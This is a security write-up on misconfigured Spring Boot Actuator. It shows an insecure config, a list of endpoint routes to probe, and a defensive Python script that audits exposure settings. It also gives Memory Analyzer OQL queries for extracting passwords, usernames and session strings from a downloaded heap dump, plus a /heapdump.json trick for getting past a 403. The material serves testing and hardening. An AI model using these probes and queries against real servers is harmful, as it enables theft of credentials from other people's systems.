0x01. Basics

  1. pom.xml contains a dependency like this (the original snippet was cut off after <exclusions>; the closing tags are restored so the fragment is well-formed):

<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-actuator</artifactId>
   <exclusions>
   </exclusions>
</dependency>

  2. Security settings are not enabled:
management:
  security:
    enabled: false
  health:
    elasticsearch:
      enabled: false
  metrics:
    export:
      prometheus:
        enabled: true
      jmx:
        enabled: true
  endpoints:
    web:
      exposure:
        include: '*'
      base-path: /auto

The server side can change the Actuator root path by editing the configuration file, for example: management.endpoints.web.base-path=/monitor

Searching source code on GitHub turns up similar settings:

0x02 Exploitation

When the application is misconfigured, the following routes may be exposed:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/integrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
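As an added example (this is not code from the original post and not Spring's own tooling), the following Python script audits a management configuration from the defender's side: it flattens an application.yml or application.properties fragment into dotted keys, applies the Spring Boot 2.x exposure rules (include selects endpoints, "*" means all, exclude overrides include, paths hang off management.endpoints.web.base-path with /actuator as the default), and flags which of the routes listed above become reachable. The weak configuration is the one quoted in the post; the hardened configuration next to it is a constructed counterpart. The YAML parser handles only nested mappings with scalar values, and the set of high-risk endpoint ids is my own judgment rather than a Spring classification.

```python
"""Audit a Spring Boot management config for over-exposed Actuator endpoints.

Added example; the parser and the risk ranking are my own, not Spring's.
"""
from typing import Dict, List, Tuple

# Endpoints whose HTTP exposure most often leaks secrets or allows control
# (my own selection from the route list in the post, not a Spring classification).
HIGH_RISK = {"heapdump", "env", "shutdown", "jolokia", "threaddump", "httptrace",
             "loggers", "configprops", "beans", "mappings", "sessions", "logfile",
             "auditevents"}
# Endpoint ids this audit knows about (Spring Boot 2.x names from the list above).
KNOWN_ENDPOINTS = HIGH_RISK | {"health", "info", "metrics", "prometheus", "caches",
                               "conditions", "scheduledtasks", "integrationgraph",
                               "flyway", "liquibase", "refresh"}

# Constructed samples: WEAK_YAML mirrors the configuration quoted in the post.
WEAK_YAML = """
management:
  security:
    enabled: false
  endpoints:
    web:
      exposure:
        include: '*'
      base-path: /auto
"""
HARDENED_YAML = """
management:
  endpoints:
    web:
      exposure:
        include: health,info
      base-path: /actuator
  endpoint:
    health:
      show-details: never
"""


def parse_yaml_subset(text: str) -> Dict[str, str]:
    """Flatten nested mappings with scalar leaves into dotted keys, e.g.
    "management.endpoints.web.base-path" -> "/auto". Lists, anchors and
    multi-line scalars are deliberately unsupported."""
    flat: Dict[str, str] = {}
    stack: List[Tuple[int, str]] = []  # (indent, key) of the current nesting path
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        while stack and stack[-1][0] >= indent:  # leave deeper/sibling scopes
            stack.pop()
        path = ".".join(k for _, k in stack) + ("." if stack else "") + key.strip()
        value = value.strip().strip("'\"")
        if value:
            flat[path] = value
        else:
            stack.append((indent, key.strip()))
    return flat


def parse_properties(text: str) -> Dict[str, str]:
    """Parse the key=value form of the same settings (application.properties)."""
    flat: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        flat[key.strip()] = value.strip()
    return flat


def split_list(value: str) -> List[str]:
    return [v.strip() for v in value.split(",") if v.strip()]


def exposed_endpoints(cfg: Dict[str, str]) -> Dict[str, str]:
    """Return {endpoint id: URL path} for endpoints reachable over HTTP under the
    Spring Boot 2.x rules (only `health` is exposed unless include says otherwise)."""
    include = split_list(cfg.get("management.endpoints.web.exposure.include", "health"))
    exclude = split_list(cfg.get("management.endpoints.web.exposure.exclude", ""))
    base = cfg.get("management.endpoints.web.base-path", "/actuator").rstrip("/")
    selected = set(KNOWN_ENDPOINTS) if "*" in include else set(include) & KNOWN_ENDPOINTS
    selected = set() if "*" in exclude else selected - set(exclude)
    return {ep: f"{base}/{ep}" for ep in sorted(selected)}


def audit(cfg: Dict[str, str]) -> List[str]:
    """One finding per risky setting; an empty list means nothing was flagged."""
    findings: List[str] = []
    if cfg.get("management.security.enabled", "true").lower() == "false":
        findings.append("management.security.enabled=false disables Actuator auth (Boot 1.x)")
    if "*" in split_list(cfg.get("management.endpoints.web.exposure.include", "")):
        findings.append("management.endpoints.web.exposure.include='*' exposes every endpoint")
    for ep, path in exposed_endpoints(cfg).items():
        if ep in HIGH_RISK:
            findings.append(f"high-risk endpoint {ep} reachable at {path}")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_YAML), ("hardened", HARDENED_YAML)):
        findings = audit(parse_yaml_subset(text))
        print(f"[{label}] {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Run against the weak configuration the script reports the disabled security switch, the wildcard include, and one line per high-risk endpoint under /auto; the hardened configuration produces no findings because only health and info remain exposed. The same audit applies to a properties file through parse_properties, which is useful when the base-path override from the post is set there instead of in YAML.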

The /heapdump endpoint returns a heap dump of the JVM, which can then be analyzed with Memory Analyzer (MAT) to recover sensitive information. Commonly used OQL queries:

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
or
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("username"))
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("url"))
select * from java.lang.String s WHERE toString(s) LIKE ".*password.*"
select * from org.springframework.web.context.support.StandardServletEnvironment
select * from java.lang.String s WHERE toString(s) LIKE ".*SESSION.*"

Notes

  • As noted in the reference link: when a download of /heapdump returns 403, /heapdump.json may still download successfully. This route is visible in the logs when Spring starts up, and every endpoint also exists under a .json path.

References
